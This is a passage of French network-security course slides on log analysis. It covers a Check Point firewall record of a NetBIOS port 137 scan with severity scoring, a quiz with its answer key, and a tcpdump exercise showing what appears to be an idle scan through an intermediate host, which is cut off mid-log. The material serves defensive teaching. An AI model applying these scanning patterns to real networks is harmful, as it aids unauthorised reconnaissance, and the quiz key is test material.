scan.wins.guy MY.NET.29.254 netbios-ns netbios-

ns 78

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

70

Firewall1 de Check Point

Analyse du log

 Source : Firewall 1 de Check Point

 Probabilité que l’adresse a été spoofée : faible

l’agresseur tente de rassembler des

informations.

 Description de l’attaque : C’est une attaque sur

tous les hosts d’un réseau de classe C.

 Mécanisme d’attaque :

 L’agresseur envoie une requête ping sur le port

137 qui présente des failles sur les machines

NT (file sharing).

 Corrélation : Les attaques sur le port 137

sont enregistrées en nombre 7 dans les

menaces (ports 135-139) www.sans.org et

CVE 1999-0288

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

71

Exemple complet (suite)

 Evidence d’être ciblé : C’est une attaque qui ne

vise pas un poste particulier.

 Sévérité :

 Criticalité = 2 : les postes sont ordinaires.

 Gravité = 2 : c’est encore en phase de

reconnaissance.

 Mesures système = 3 : machines avec OS normal.

 Mesures réseau = 5 : Très bonne protection réseau.

 Sévérité = (2+2)-(3+5) = -4

 Recommandations :

 La défense est bonne

 Le firewall a bien bloqué l’attaque.

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

72

QCM

 Déterminer la réponse exacte du scan

précédent:

A. Le scan vise un serveur Web

B. Le scan vise le port 53

C. Le scan vise le port 137

D. Le trafic NetBios est TCP

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

73

Réponse au QCM

 Réponse C

 NetBios-ns tourne sur des machines Windows

sur le port 137/UDP.

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

74

 Nous avons obtenu le log TCPDump suivant :

Exercice

 18:34:33.669535 attacker.badguy.net.1215 > middle.man.com.0: . win 512

(ttl 64, id 1787)

 18:34:33.669741 middle.man.com.0 > attacker.badguy.net.1215: R 0:0(0)

ack 1575966427 win 0 (ttl 128, id 1561)

 18:34:34.660155 attacker.badguy.net.1216 > middle.man.com.0: . win 512

(ttl 64, id 33140)

 18:34:34.660330 middle.man.com.0 > attacker.badguy.net.1216: R 0:0(0)

ack 961495062 win 0 (ttl 128, id 1817)

 18:34:35.015536 middle.man.com.135> target.box.com.135: SF

1763821839:1763821839(0) win 512 (ttl 64, id 39426)

 18:34:35.015965 target.box.com.135 > middle.man.com.135: S

18827712:18827712(0) ack 1763821840 win 8576 <mss 1460> (DF) (ttl 128,

id 56975)

 18:34:35.016097 middle.man.com.135 > target.box.com.135: R

1763821840:1763821840(0) win 0 (ttl 128, id 2073)

(c) A.JEMAI - Séc SysExp-Réseaux-

Analyse des Logs - 2020

75

Scan sur port ouvert (suite)

 18:34:35.660098 attacker.badguy.net.1217 > middle.man.com.0: . win

512 (ttl 64, id 7329)

 18:34:35.660255 middle.man.com.0 > attacker.badguy.net.1217: R

0:0(0) ac...